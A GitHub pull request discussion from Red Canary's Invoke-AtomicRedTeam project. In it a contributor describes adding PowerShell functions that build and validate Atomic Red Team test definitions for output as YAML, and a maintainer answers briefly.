search

redcanaryco / invoke-atomicredteam

Invoke-AtomicRedTeam is a PowerShell module to execute tests as defined in the [atomics folder](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics) of Red Canary's Atomic Red Team project.
MIT License
818 stars 194 forks source link

Adding atomic technique/test creation functions #3

Closed mgraeber-rc closed 4 years ago

mgraeber-rc commented 4 years ago

I've never personally found it to be easy or scalable to write atomic techniques/tests in YAML. I added the following functions to invoke-atomicredteam so that atomic techniques/tests can be developed in pure PowerShell:

The output of these functions are designed to be piped directly to ConvertTo-Yaml.

These functions solve the following problems for me:

  1. Writing YAML by hand is prone to errors
  2. The only other existing atomic YAML generation code is in the atomic-red-team repo which just generates a template YAML stub.
  3. Previously, there existed no option to write atomic technique/tests in pure code. This allows that and validation is performed before any object is returned so that there is a relatively sage guarantee that generated YAML is conformant to the atomic schema.
clr2of8 commented 4 years ago

Looks amazing Matt, I'll try it out tomorrow!